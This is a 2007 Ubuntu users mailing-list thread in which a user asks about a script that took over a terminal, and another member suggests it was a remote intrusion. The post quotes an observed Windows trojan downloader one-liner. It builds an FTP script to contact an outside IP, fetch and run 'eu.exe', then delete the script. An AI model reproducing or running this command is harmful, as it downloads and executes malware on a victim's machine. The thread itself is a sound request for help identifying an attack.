Antivirus program for ubuntu feisty amd64
Lucio M Nicolosi
lmario at philippe.com.br
Sat May 12 05:32:48 UTC 2007
> Lucio M Nicolosi wrote:
>> Mario Vukelic wrote:
>>>> You would not have had any infections on Linux without the antivir
>>>> program either, since there are no Linux viruses in the wild :)
>> New to Linux, installed a Ubuntu 6.10 partition (for tests) in my office
>> desktop, connected to Novell Netware and an ADSL link (Suse Linux Proxy
>> and Firewall).
>> A couple of days ago noticed an application suddenly taking control of
>> the terminal window and running the following script:
>> (user)@phil:~$ 5~.~
>> (user)@phil::~$ %systemroot%\system32\cmd.exe
>> (user)@phil:~$ cmd /c echo open 188.8.131.52 42043 >> ik &echo
>> user t g >> ik &echo get eu.exe >> ik &echo bye >> ik &ftp -n -v -s:ik
>> &del ik &eu.exe &exit
>> from the script "ik" in /home/(user)
>> Could't find any "ik" script in my home (Ubuntu 7.04) desktop.
>> Looked like a worm, then I run antivirus on Win partition, looked for
>> the Windows "eu.exe" virus and variants but found no trace of it, at
>> least on my desktop.
>> Has anyone any idea of what kind of script is this?
> More then likely, someone logged on to your computer (looks like they
> did it through telnet, but i could be wrong). In that case, either hook
> your computer into a firewall or download one for linux (which linux
> doesnt really need one, but if you are using your system for large-scale
> business, then its a good idea to get a firewall)
> Sometimes i have noticed that when somebody logs on to my system and
> runs there script (yes i was hacked once..good thing my firewall blocked
> the attack...but it didnt catch the remote login?), it doesnt execute
> right..just fyi..most of the time it does though, especially when DoSing.
Just found a very recent reference for an "CBA Trojan" in the folowing link
it describes exactly what I noticed in my Ubuntu desktop.
More information about the ubuntu-users